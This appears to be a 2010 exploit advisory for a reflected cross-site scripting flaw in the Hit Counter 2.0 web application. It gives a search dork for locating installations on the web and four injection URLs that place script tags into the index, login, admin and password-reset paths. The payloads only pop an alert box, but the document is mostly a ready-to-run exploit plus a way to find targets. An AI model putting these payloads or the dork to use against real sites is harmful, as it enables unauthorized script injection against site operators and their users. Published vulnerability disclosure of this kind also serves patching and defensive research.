Home / os / winme

Hit Counter 2.0 Cross Site Scripting Vulnerability

Posted on 10 March 2010

================================================== Hit Counter 2.0 Cross Site Scripting Vulnerability ================================================== | # Dork : Powered by Hit Counter v2.0 (c) eTek Systems | # Tested on: windows SP2 Fran?§ais V.(Pnx2 2.0) + Lunix Fran?§ais v.(9.4 Ubuntu) | # Bug : XSS ====================== Exploit By indoushka ================================= # Exploit : 1- XSS (Cross Site Scripting in URI) http://server/ww-hc20/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt> http://server/ww-hc20/inc/login.php/>'><ScRiPt>alert(213771818860)</ScRiPt> http://server/ww-hc20/admin/index.php/>'><ScRiPt>alert(213771818860)</ScRiP t> http://server/ww-hc20/admin/forgot.php/>"><ScRiPt>alert(213771818860)</ScRi Pt> # ~ - [ [ : Inj3ct0r : ] ]

 

TOP